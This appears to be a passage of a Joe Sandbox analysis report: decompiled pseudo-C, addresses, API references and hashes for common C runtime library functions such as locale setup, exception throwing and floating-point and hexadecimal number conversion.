0x004028fd
0x00402903
0x0040290a
0x0040290f
0x00402915
0x00402917
0x0040291e
0x00402923
0x00402927
0x0040292a
0x0040292d
0x00402930
0x00402933
0x00402936
0x00402939
0x0040293c
0x0040293f
0x00402943
0x00402948
0x0040294a
0x00402955
0x0040295d
0x0040296c
0x00402974
0x00402974
0x0040297b
0x00402989
0x00402996

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040291E
std::exception::exception.LIBCMT ref: 0040295D

Part of subcall function 00422354: std::exception::_Copy_str.LIBCMT ref: 0042236F

__CxxThrowException@8.LIBCMT ref: 00402974

Part of subcall function 00422CB4: RaiseException.KERNEL32(?,?,00422CB3,B51EC2B3,?,?,?,?,00422CB3,B51EC2B3,00459510,004637F4,B51EC2B3), ref: 00422CF6

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040297B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 73090415-0
Opcode ID: 0b0a6176803d8a50c25518b88d44a5eb96d1d97662effe1fe8167584f695b9c3
Instruction ID: a0bc81784d28652bf6f233a66fb281e138822015cd0d0b03f4fa3ebf70dab1d3
Opcode Fuzzy Hash: 0b0a6176803d8a50c25518b88d44a5eb96d1d97662effe1fe8167584f695b9c3
Instruction Fuzzy Hash: 2B1142B15087409EC310DF29D981A57FBE8FB58714F404A2FF49993741D778A50CCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0042963C Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042963C(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00428F2E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00429015(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0042954F(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0042948E(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0042963c
0x00429641
0x00429647
0x004296ba
0x00000000
0x0042964e
0x0042964e
0x00429651
0x0042966c
0x0042966f
0x0042968f
0x004296a1
0x00429671
0x00429671
0x00429674
0x00000000
0x00429676
0x00429688
0x00429688
0x00429674
0x004296bf
0x004296c3
0x00429653
0x0042966b
0x0042966b
0x00429651

APIs

__cftof_l.LIBCMT ref: 00429662

Part of subcall function 0042948E: __fltout2.LIBCMT ref: 004294B9

__cftog_l.LIBCMT ref: 00429688
__cftoe_l.LIBCMT ref: 004296BA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: d96828215f786e3b02f8ed2ec05212c4eb4726e60151b6da8668b41ae644d9ef
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 00114E3210015ABBCF126E85EC01CEE3F66BB58354F998516FE1859131D73AC9B2AB89

Uniqueness

Uniqueness Score: -1.00%

Function 0043A33D Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0043A33D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t202;
				signed int _t203;
				void* _t207;
				signed int _t208;
				void* _t210;
				char* _t211;
				signed int _t212;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t219;
				signed int _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t235;
				intOrPtr* _t249;
				char* _t259;
				intOrPtr _t265;
				intOrPtr* _t266;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t278;
				intOrPtr _t279;
				void* _t282;
				intOrPtr _t337;
				intOrPtr* _t354;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				intOrPtr _t361;
				void* _t362;
				void* _t363;

				_push(0x6c);
				E00425719(E0044F5BD, __ebx, __edi, __esi);
				_t356 =  *(_t362 + 0xc);
				_t361 =  *((intOrPtr*)(_t362 + 0x10));
				 *(_t362 - 0x58) =  *(_t362 + 0x14);
				 *(_t362 - 0x68) =  *(_t362 + 0x1c);
				 *(_t362 - 0x74) = _t356;
				_t202 = E004013A0(_t362 - 0x70);
				 *(_t362 - 4) =  *(_t362 - 4) & 0x00000000;
				_t203 = E004046B0(_t202);
				 *(_t362 - 4) =  *(_t362 - 4) | 0xffffffff;
				_t291 = _t203;
				 *(_t362 - 0x6c) = _t291;
				E004012D0();
				E00403840(_t362 - 0x48);
				 *(_t362 - 4) = 1;
				 *(_t362 - 0x50) = _t356;
				 *((char*)(_t362 - 0x51)) = 0;
				_t207 = E00439B42(_t361,  *(_t362 - 0x58));
				if(_t207 != 0) {
					L10:
					_t208 =  *(_t362 - 0x50);
					_t357 =  *(_t362 - 0x58);
					 *(_t362 - 0x60) =  *(_t362 - 0x60) & 0x00000000;
					 *(_t362 - 0x64) =  *(_t362 - 0x64) & 0x00000000;
					 *_t208 = 0x7830;
					 *(_t362 - 0x50) = _t208 + 2;
					 *((char*)(_t362 - 0x49)) = 0;
					_t210 = E00439B42(_t361, _t357);
					if(_t210 != 0) {
						L23:
						_t211 =  *((intOrPtr*)(_t362 - 0x48));
						if( *((intOrPtr*)(_t362 - 0x34)) < 0x10) {
							_t211 = _t362 - 0x48;
						}
						if( *_t211 == 0x7f) {
							L81:
							_push(_t357);
							while(1) {
								_t212 = E00439B42(_t361);
								__eflags = _t212;
								if(_t212 != 0) {
									goto L94;
								}
								__eflags =  *(_t361 + 4);
								if( *(_t361 + 4) == 0) {
									E00439B1C(_t361);
								}
								_t357 = E00439AA5( *((intOrPtr*)(_t362 + 8)),  *(_t361 + 5) & 0x000000ff, 0x30, 0x61, 0x41);
								_t363 = _t363 + 0x14;
								__eflags = _t357;
								if(_t357 < 0) {
									goto L94;
								} else {
									__eflags =  *(_t362 - 0x60) - 0x24;
									if( *(_t362 - 0x60) < 0x24) {
										__eflags =  *(_t361 + 4);
										if( *(_t361 + 4) == 0) {
											E00439B1C(_t361);
										}
										__eflags =  *(_t361 + 5) - 0x30;
										if( *(_t361 + 5) != 0x30) {
											L91:
											_t124 = _t357 + "0123456789abcdef"; // 0x33323130
											 *(_t362 - 0x50) =  *(_t362 - 0x50) + 1;
											_t127 = _t362 - 0x60;
											 *_t127 =  *(_t362 - 0x60) + 1;
											__eflags =  *_t127;
											 *( *(_t362 - 0x50)) =  *_t124;
											goto L92;
										} else {
											__eflags =  *(_t362 - 0x60);
											if( *(_t362 - 0x60) == 0) {
												L92:
												 *((char*)(_t362 - 0x49)) = 1;
												E00439AF8(_t361);
												_push( *(_t362 - 0x58));
												continue;
											}
											goto L91;
										}
									}
									 *(_t362 - 0x64) =  *(_t362 - 0x64) + 1;
									goto L92;
								}
							}
							goto L94;
						} else {
							_t259 =  *((intOrPtr*)(_t362 - 0x48));
							if( *((intOrPtr*)(_t362 - 0x34)) < 0x10) {
								_t259 = _t362 - 0x48;
							}
							if( *_t259 <= 0) {
								goto L81;
							} else {
								if( *((intOrPtr*)(_t362 - 0x38)) != 0) {
									 *((char*)(_t362 - 0x59)) =  *((intOrPtr*)( *_t291 + 8))();
								} else {
									 *((char*)(_t362 - 0x59)) = 0;
								}
								 *(_t362 - 0x1c) =  *(_t362 - 0x1c) & 0x00000000;
								 *((intOrPtr*)(_t362 - 0x18)) = 0xf;
								 *((char*)(_t362 - 0x2c)) = 0;
								E0040BFB0(_t362 - 0x2c, 1, 0);
								 *(_t362 - 4) = 2;
								_t291 = 0;
								if(E00439B42(_t361, _t357) != 0) {
									L64:
									_t354 =  *((intOrPtr*)(_t362 - 0x48));
									if( *((intOrPtr*)(_t362 - 0x34)) < 0x10) {
										_t354 = _t362 - 0x48;
									}
									if( *((char*)(_t362 - 0x51)) != 0) {
										L80:
										 *(_t362 - 4) = 1;
										E00402E20(_t362 - 0x2c, 1, 0);
										L94:
										__eflags =  *((char*)(_t362 - 0x49));
										if( *((char*)(_t362 - 0x49)) != 0) {
											__eflags =  *(_t362 - 0x60);
											if( *(_t362 - 0x60) == 0) {
												_t134 = _t362 - 0x50;
												 *_t134 =  *(_t362 - 0x50) + 1;
												__eflags =  *_t134;
												 *( *(_t362 - 0x50)) = 0x30;
											}
										}
										_t215 = E00439B42(_t361,  *(_t362 - 0x58));
										__eflags = _t215;
										if(_t215 == 0) {
											__eflags =  *(_t361 + 4) - _t215;
											if( *(_t361 + 4) == _t215) {
												E00439B1C(_t361);
											}
											_t291 =  *(_t361 + 5);
											__eflags =  *(_t361 + 5) -  *((intOrPtr*)( *( *(_t362 - 0x6c)) + 4))();
											if(__eflags == 0) {
												_t249 = E004230FE(_t291, _t357, _t361, __eflags);
												_t142 = _t362 - 0x50;
												 *_t142 =  *(_t362 - 0x50) + 1;
												__eflags =  *_t142;
												 *( *(_t362 - 0x50)) =  *((intOrPtr*)( *_t249));
												E00439AF8(_t361);
											}
										}
										__eflags =  *(_t362 - 0x60);
										if( *(_t362 - 0x60) == 0) {
											while(1) {
												_t216 = E00439B42(_t361,  *(_t362 - 0x58));
												__eflags = _t216;
												if(_t216 != 0) {
													break;
												}
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												__eflags =  *(_t361 + 5) - 0x30;
												if( *(_t361 + 5) != 0x30) {
													break;
												} else {
													_t148 = _t362 - 0x64;
													 *_t148 =  *(_t362 - 0x64) - 1;
													__eflags =  *_t148;
													 *((char*)(_t362 - 0x49)) = 1;
													E00439AF8(_t361);
													continue;
												}
											}
											__eflags =  *(_t362 - 0x64);
											_t358 =  *(_t362 - 0x50);
											if( *(_t362 - 0x64) < 0) {
												 *_t358 = 0x30;
												_t358 = _t358 + 1;
												 *(_t362 - 0x64) =  *(_t362 - 0x64) + 1;
											}
											goto L117;
										} else {
											_t358 =  *(_t362 - 0x50);
											while(1) {
												L117:
												_t217 = E00439B42(_t361,  *(_t362 - 0x58));
												__eflags = _t217;
												if(_t217 != 0) {
													break;
												}
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												_t219 = E00439AA5( *((intOrPtr*)(_t362 + 8)),  *(_t361 + 5) & 0x000000ff, 0x30, 0x61, 0x41);
												_t363 = _t363 + 0x14;
												__eflags = _t219;
												if(_t219 < 0) {
													break;
												} else {
													__eflags =  *(_t362 - 0x60) - 0x24;
													if( *(_t362 - 0x60) < 0x24) {
														_t160 = _t219 + "0123456789abcdef"; // 0x33323130
														 *_t358 =  *_t160;
														_t358 = _t358 + 1;
														_t161 = _t362 - 0x60;
														 *_t161 =  *(_t362 - 0x60) + 1;
														__eflags =  *_t161;
													}
													 *((char*)(_t362 - 0x49)) = 1;
													E00439AF8(_t361);
													continue;
												}
											}
											__eflags =  *((char*)(_t362 - 0x49));
											if( *((char*)(_t362 - 0x49)) == 0) {
												L155:
												__eflags =  *((char*)(_t362 - 0x51));
												if( *((char*)(_t362 - 0x51)) != 0) {
													L157:
													_t358 =  *(_t362 - 0x74);
													L158:
													 *_t358 = 0;
													 *( *(_t362 - 0x68)) =  *(_t362 - 0x64);
													E00402E20(_t362 - 0x48, 1, 0);
													__eflags = 0;
													return E00425763(_t291, _t358, _t361);
												}
												__eflags =  *((char*)(_t362 - 0x49));
												if( *((char*)(_t362 - 0x49)) != 0) {
													goto L158;
												}
												goto L157;
											}
											_t224 = E00439B42(_t361,  *(_t362 - 0x58));
											__eflags = _t224;
											if(_t224 != 0) {
												goto L155;
											}
											__eflags =  *(_t361 + 4) - _t224;
											if( *(_t361 + 4) == _t224) {
												E00439B1C(_t361);
											}
											__eflags =  *(_t361 + 5) - 0x70;
											if( *(_t361 + 5) == 0x70) {
												L126:
												 *_t358 = 0x70;
												_t358 = _t358 + 1;
												E00439AF8(_t361);
												 *((char*)(_t362 - 0x49)) = 0;
												_t291 = 0;
												_t226 = E00439B42(_t361,  *(_t362 - 0x58));
												__eflags = _t226;
												if(_t226 != 0) {
													L136:
													_t227 = E00439B42(_t361,  *(_t362 - 0x58));
													__eflags = _t227;
													if(_t227 != 0) {
														while(1) {
															L154:
															_t228 = E00439B42(_t361,  *(_t362 - 0x58));
															__eflags = _t228;
															if(_t228 != 0) {
																goto L155;
															}
															__eflags =  *(_t361 + 4);
															if( *(_t361 + 4) == 0) {
																E00439B1C(_t361);
															}
															__eflags =  *(_t361 + 5) - 0x30;
															if( *(_t361 + 5) < 0x30) {
																goto L155;
															} else {
																__eflags =  *(_t361 + 4);
																if( *(_t361 + 4) == 0) {
																	E00439B1C(_t361);
																}
																__eflags =  *(_t361 + 5) - 0x39;
																if( *(_t361 + 5) > 0x39) {
																	goto L155;
																} else {
																	__eflags = _t291 - 8;
																	if(_t291 < 8) {
																		__eflags =  *(_t361 + 4);
																		if( *(_t361 + 4) == 0) {
																			E00439B1C(_t361);
																		}
																		 *_t358 =  *(_t361 + 5);
																		_t358 = _t358 + 1;
																		_t291 = _t291 + 1;
																		__eflags = _t291;
																	}
																	 *((char*)(_t362 - 0x49)) = 1;
																	E00439AF8(_t361);
																	continue;
																}
															}
														}
														goto L155;
													} else {
														goto L137;
													}
													while(1) {
														L137:
														__eflags =  *(_t361 + 4) - _t291;
														if( *(_t361 + 4) == _t291) {
															E00439B1C(_t361);
														}
														__eflags =  *(_t361 + 5) - 0x30;
														if( *(_t361 + 5) != 0x30) {
															break;
														}
														 *((char*)(_t362 - 0x49)) = 1;
														E00439AF8(_t361);
														_t235 = E00439B42(_t361,  *(_t362 - 0x58));
														__eflags = _t235;
														if(_t235 == 0) {
															continue;
														}
														break;
													}
													__eflags =  *((intOrPtr*)(_t362 - 0x49)) - _t291;
													if( *((intOrPtr*)(_t362 - 0x49)) != _t291) {
														 *_t358 = 0x30;
														_t358 = _t358 + 1;
													}
													goto L154;
												}
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												__eflags =  *(_t361 + 5) - 0x2b;
												if( *(_t361 + 5) != 0x2b) {
													__eflags =  *(_t361 + 4) - _t291;
													if( *(_t361 + 4) == _t291) {
														E00439B1C(_t361);
													}
													__eflags =  *(_t361 + 5) - 0x2d;
													if( *(_t361 + 5) != 0x2d) {
														goto L136;
													} else {
														 *_t358 = 0x2d;
														goto L135;
													}
												} else {
													 *_t358 = 0x2b;
													L135:
													_t358 = _t358 + 1;
													__eflags = _t358;
													E00439AF8(_t361);
													goto L136;
												}
											} else {
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												__eflags =  *(_t361 + 5) - 0x50;
												if( *(_t361 + 5) != 0x50) {
													goto L155;
												} else {
													goto L126;
												}
											}
										}
									} else {
										while(_t291 != 0) {
											_t337 =  *_t354;
											if(_t337 == 0x7f) {
												goto L80;
											}
											_t291 = _t291 - 1;
											if(_t291 == 0) {
												L73:
												if(_t291 != 0) {
													L77:
													if( *((char*)(_t354 + 1)) > 0) {
														_t354 = _t354 + 1;
													}
													continue;
												}
												_t266 =  *((intOrPtr*)(_t362 - 0x2c));
												if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
													_t266 = _t362 - 0x2c;
												}
												if(_t337 <  *_t266) {
													L79:
													 *((char*)(_t362 - 0x51)) = 1;
													goto L80;
												} else {
													goto L77;
												}
											}
											_t265 =  *((intOrPtr*)(_t362 - 0x2c));
											if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
												_t265 = _t362 - 0x2c;
											}
											if(_t337 !=  *((intOrPtr*)(_t265 + _t291))) {
												goto L79;
											} else {
												goto L73;
											}
										}
										goto L80;
									}
								} else {
									do {
										if( *(_t361 + 4) == 0) {
											E00439B1C(_t361);
										}
										 *((char*)(_t362 - 0x78)) =  *(_t361 + 5);
										_t357 = E00439AA5( *((intOrPtr*)(_t362 + 8)),  *((intOrPtr*)(_t362 - 0x78)), 0x30, 0x61, 0x41);
										_t363 = _t363 + 0x14;
										if(_t357 < 0) {
											__eflags =  *((intOrPtr*)(_t362 - 0x18)) - 0x10;
											_t269 =  *((intOrPtr*)(_t362 - 0x2c));
											if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
												_t269 = _t362 - 0x2c;
											}
											__eflags =  *((char*)(_t269 + _t291));
											if( *((char*)(_t269 + _t291)) == 0) {
												break;
											} else {
												__eflags =  *((char*)(_t362 - 0x59));
												if( *((char*)(_t362 - 0x59)) == 0) {
													break;
												}
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												__eflags =  *(_t361 + 5) -  *((intOrPtr*)(_t362 - 0x59));
												if( *(_t361 + 5) !=  *((intOrPtr*)(_t362 - 0x59))) {
													break;
												} else {
													E00403B10(_t362 - 0x2c, 1, 0);
													_t291 = _t291 + 1;
													__eflags = _t291;
													goto L57;
												}
											}
										} else {
											 *((char*)(_t362 - 0x49)) = 1;
											if( *(_t362 - 0x60) < 0x24) {
												__eflags =  *(_t361 + 4);
												if( *(_t361 + 4) == 0) {
													E00439B1C(_t361);
												}
												__eflags =  *(_t361 + 5) - 0x30;
												if( *(_t361 + 5) != 0x30) {
													L42:
													_t70 = _t357 + "0123456789abcdef"; // 0x33323130
													 *(_t362 - 0x50) =  *(_t362 - 0x50) + 1;
													_t73 = _t362 - 0x60;
													 *_t73 =  *(_t362 - 0x60) + 1;
													__eflags =  *_t73;
													 *( *(_t362 - 0x50)) =  *_t70;
													goto L43;
												} else {
													__eflags =  *(_t362 - 0x60);
													if( *(_t362 - 0x60) == 0) {
														L43:
														_t278 =  *((intOrPtr*)(_t362 - 0x2c));
														if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
															_t278 = _t362 - 0x2c;
														}
														if( *((char*)(_t278 + _t291)) != 0x7f) {
															_t279 =  *((intOrPtr*)(_t362 - 0x2c));
															if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
																_t279 = _t362 - 0x2c;
															}
															 *((char*)(_t279 + _t291)) =  *((char*)(_t279 + _t291)) + 1;
														}
														goto L57;
													}
													goto L42;
												}
											}
											 *(_t362 - 0x64) =  *(_t362 - 0x64) + 1;
											goto L43;
										}
										L57:
										E00439AF8(_t361);
									} while (E00439B42(_t361,  *(_t362 - 0x58)) == 0);
									if(_t291 != 0) {
										_t270 =  *((intOrPtr*)(_t362 - 0x2c));
										if( *((intOrPtr*)(_t362 - 0x18)) < 0x10) {
											_t270 = _t362 - 0x2c;
										}
										if( *((char*)(_t270 + _t291)) <= 0) {
											 *((char*)(_t362 - 0x51)) = 1;
										} else {
											_t291 = _t291 + 1;
										}
									}
									goto L64;
								}
							}
						}
					}
					if( *(_t361 + 4) == _t210) {
						E00439B1C(_t361);
					}
					if( *(_t361 + 5) != 0x30) {
						goto L23;
					}
					E00439AF8(_t361);
					_t282 = E00439B42(_t361, _t357);
					if(_t282 != 0) {
						L22:
						 *((char*)(_t362 - 0x49)) = 1;
						goto L23;
					}
					if( *(_t361 + 4) == _t282) {
						E00439B1C(_t361);
					}
					if( *(_t361 + 5) == 0x78) {
						L21:
						E00439AF8(_t361);
						goto L23;
					} else {
						if( *(_t361 + 4) == 0) {
							E00439B1C(_t361);
						}
						if( *(_t361 + 5) != 0x58) {
							goto L22;
						} else {
							goto L21;
						}
					}
				} else {
					if( *(_t361 + 4) == _t207) {
						E00439B1C(_t361);
					}
					if( *(_t361 + 5) != 0x2b) {
						__eflags =  *(_t361 + 4);
						if( *(_t361 + 4) == 0) {
							E00439B1C(_t361);
						}
						__eflags =  *(_t361 + 5) - 0x2d;
						if( *(_t361 + 5) != 0x2d) {
							goto L10;
						} else {
							 *_t356 = 0x2d;
							goto L9;
						}
					} else {
						 *_t356 = 0x2b;
						L9:
						 *(_t362 - 0x50) = _t356 + 1;
						E00439AF8(_t361);
						goto L10;
					}
				}
			}

0x0043a33d
0x0043a344
0x0043a34c
0x0043a352
0x0043a355
0x0043a35b
0x0043a362
0x0043a365
0x0043a36a
0x0043a36f
0x0043a374
0x0043a379
0x0043a37e
0x0043a381
0x0043a38c
0x0043a396
0x0043a39d
0x0043a3a0
0x0043a3a4
0x0043a3ab
0x0043a3e5
0x0043a3e5
0x0043a3e8
0x0043a3eb
0x0043a3ef
0x0043a3f3
0x0043a3fe
0x0043a401
0x0043a405
0x0043a40c
0x0043a465
0x0043a469
0x0043a46c
0x0043a46e
0x0043a46e
0x0043a474
0x0043a633
0x0043a633
0x0043a6a2
0x0043a6a4
0x0043a6a9
0x0043a6ab
0x00000000
0x00000000
0x0043a636
0x0043a63a
0x0043a63e
0x0043a63e
0x0043a656
0x0043a658
0x0043a65b
0x0043a65d
0x00000000
0x0043a65f
0x0043a65f
0x0043a663
0x0043a66a
0x0043a66e
0x0043a672
0x0043a672
0x0043a677
0x0043a67b
0x0043a683
0x0043a686
0x0043a68c
0x0043a68f
0x0043a68f
0x0043a68f
0x0043a692
0x00000000
0x0043a67d
0x0043a67d
0x0043a681
0x0043a694
0x0043a696
0x0043a69a
0x0043a69f
0x00000000
0x0043a69f
0x00000000
0x0043a681
0x0043a67b
0x0043a665
0x00000000
0x0043a665
0x0043a65d
0x00000000
0x0043a47a
0x0043a47e
0x0043a481
0x0043a483
0x0043a483
0x0043a489
0x00000000
0x0043a48f
0x0043a493
0x0043a4a2
0x0043a495
0x0043a495
0x0043a495
0x0043a4a5
0x0043a4b0
0x0043a4b7
0x0043a4bb
0x0043a4c3
0x0043a4c7
0x0043a4d0
0x0043a5cf
0x0043a5d3
0x0043a5d6
0x0043a5d8
0x0043a5d8
0x0043a5df
0x0043a621
0x0043a628
0x0043a62c
0x0043a6ad
0x0043a6ad
0x0043a6b1
0x0043a6b3
0x0043a6b7
0x0043a6bc
0x0043a6bc
0x0043a6bc
0x0043a6bf
0x0043a6bf
0x0043a6b7
0x0043a6c7
0x0043a6cc
0x0043a6ce
0x0043a6d0
0x0043a6d3
0x0043a6d7
0x0043a6d7
0x0043a6e1
0x0043a6e7
0x0043a6e9
0x0043a6eb
0x0043a6f7
0x0043a6f7
0x0043a6f7
0x0043a6fa
0x0043a6fe
0x0043a6fe
0x0043a6e9
0x0043a703
0x0043a707
0x0043a732
0x0043a737
0x0043a73c
0x0043a73e
0x00000000
0x00000000
0x0043a711
0x0043a715
0x0043a719
0x0043a719
0x0043a71e
0x0043a722
0x00000000
0x0043a724
0x0043a724
0x0043a724
0x0043a724
0x0043a729
0x0043a72d
0x00000000
0x0043a72d
0x0043a722
0x0043a740
0x0043a744
0x0043a747
0x0043a749
0x0043a74c
0x0043a74d
0x0043a74d
0x00000000
0x0043a709
0x0043a709
0x0043a796
0x0043a796
0x0043a79b
0x0043a7a0
0x0043a7a2
0x00000000
0x00000000
0x0043a752
0x0043a756
0x0043a75a
0x0043a75a
0x0043a76d
0x0043a772
0x0043a775
0x0043a777
0x00000000
0x0043a779
0x0043a779
0x0043a77d
0x0043a77f
0x0043a785
0x0043a787
0x0043a788
0x0043a788
0x0043a788
0x0043a788
0x0043a78d
0x0043a791
0x00000000
0x0043a791
0x0043a777
0x0043a7a4
0x0043a7a8
0x0043a8dc
0x0043a8dc
0x0043a8e0
0x0043a8e8
0x0043a8e8
0x0043a8eb
0x0043a8f1
0x0043a8f6
0x0043a8fd
0x0043a902
0x0043a909
0x0043a909
0x0043a8e2
0x0043a8e6
0x00000000
0x00000000
0x00000000
0x0043a8e6
0x0043a7b3
0x0043a7b8
0x0043a7ba
0x00000000
0x00000000
0x0043a7c0
0x0043a7c3
0x0043a7c7
0x0043a7c7
0x0043a7cc
0x0043a7d0
0x0043a7e9
0x0043a7e9
0x0043a7ee
0x0043a7ef
0x0043a7f9
0x0043a7fd
0x0043a7ff
0x0043a804
0x0043a806
0x0043a83c
0x0043a841
0x0043a846
0x0043a848
0x0043a8ce
0x0043a8ce
0x0043a8d3
0x0043a8d8
0x0043a8da
0x00000000
0x00000000
0x0043a884
0x0043a888
0x0043a88c
0x0043a88c
0x0043a891
0x0043a895
0x00000000
0x0043a897
0x0043a897
0x0043a89b
0x0043a89f
0x0043a89f
0x0043a8a4
0x0043a8a8
0x00000000
0x0043a8aa
0x0043a8aa
0x0043a8ad
0x0043a8af
0x0043a8b3
0x0043a8b7
0x0043a8b7
0x0043a8bf
0x0043a8c1
0x0043a8c2
0x0043a8c2
0x0043a8c2
0x0043a8c5
0x0043a8c9
0x00000000
0x0043a8c9
0x0043a8a8
0x0043a895
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a84e
0x0043a84e
0x0043a84e
0x0043a851
0x0043a855
0x0043a855
0x0043a85a
0x0043a85e
0x00000000
0x00000000
0x0043a862
0x0043a866
0x0043a870
0x0043a875
0x0043a877
0x00000000
0x00000000
0x00000000
0x0043a877
0x0043a879
0x0043a87c
0x0043a87e
0x0043a881
0x0043a881
0x00000000
0x0043a87c
0x0043a808
0x0043a80b
0x0043a80f
0x0043a80f
0x0043a814
0x0043a818
0x0043a81f
0x0043a822
0x0043a826
0x0043a826
0x0043a82b
0x0043a82f
0x00000000
0x0043a831
0x0043a831
0x00000000
0x0043a831
0x0043a81a
0x0043a81a
0x0043a834
0x0043a836
0x0043a836
0x0043a837
0x00000000
0x0043a837
0x0043a7d2
0x0043a7d2
0x0043a7d6
0x0043a7da
0x0043a7da
0x0043a7df
0x0043a7e3
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a7e3
0x0043a7d0
0x0043a5e1
0x0043a5e1
0x0043a5e5
0x0043a5ea
0x00000000
0x00000000
0x0043a5ec
0x0043a5ed
0x0043a600
0x0043a602
0x0043a614
0x0043a618
0x0043a61a
0x0043a61a
0x00000000
0x0043a618
0x0043a608
0x0043a60b
0x0043a60d
0x0043a60d
0x0043a612
0x0043a61d
0x0043a61d
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a612
0x0043a5f3
0x0043a5f6
0x0043a5f8
0x0043a5f8
0x0043a5fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0043a5fe
0x00000000
0x0043a5e1
0x0043a4d6
0x0043a4d6
0x0043a4da
0x0043a4de
0x0043a4de
0x0043a4ea
0x0043a4fa
0x0043a4fc
0x0043a501
0x0043a55f
0x0043a563
0x0043a566
0x0043a568
0x0043a568
0x0043a56b
0x0043a56f
0x00000000
0x0043a571
0x0043a571
0x0043a575
0x00000000
0x00000000
0x0043a577
0x0043a57b
0x0043a57f
0x0043a57f
0x0043a587
0x0043a58a
0x00000000
0x0043a58c
0x0043a593
0x0043a598
0x0043a598
0x00000000
0x0043a598
0x0043a58a
0x0043a503
0x0043a507
0x0043a50b
0x0043a512
0x0043a516
0x0043a51a
0x0043a51a
0x0043a51f
0x0043a523
0x0043a52b
0x0043a52e
0x0043a534
0x0043a537
0x0043a537
0x0043a537
0x0043a53a
0x00000000
0x0043a525
0x0043a525
0x0043a529
0x0043a53c
0x0043a540
0x0043a543
0x0043a545
0x0043a545
0x0043a54c
0x0043a552
0x0043a555
0x0043a557
0x0043a557
0x0043a55a
0x0043a55a
0x00000000
0x0043a54c
0x00000000
0x0043a529
0x0043a523
0x0043a50d
0x00000000
0x0043a50d
0x0043a599
0x0043a59b
0x0043a5aa
0x0043a5b4
0x0043a5ba
0x0043a5bd
0x0043a5bf
0x0043a5bf
0x0043a5c6
0x0043a5cb
0x0043a5c8
0x0043a5c8
0x0043a5c8
0x0043a5c6
0x00000000
0x0043a5b4
0x0043a4d0
0x0043a489
0x0043a474
0x0043a411
0x0043a415
0x0043a415
0x0043a41e
0x00000000
0x00000000
0x0043a422
0x0043a42a
0x0043a431
0x0043a461
0x0043a461
0x00000000
0x0043a461
0x0043a436
0x0043a43a
0x0043a43a
0x0043a443
0x0043a458
0x0043a45a
0x00000000
0x0043a445
0x0043a449
0x0043a44d
0x0043a44d
0x0043a456
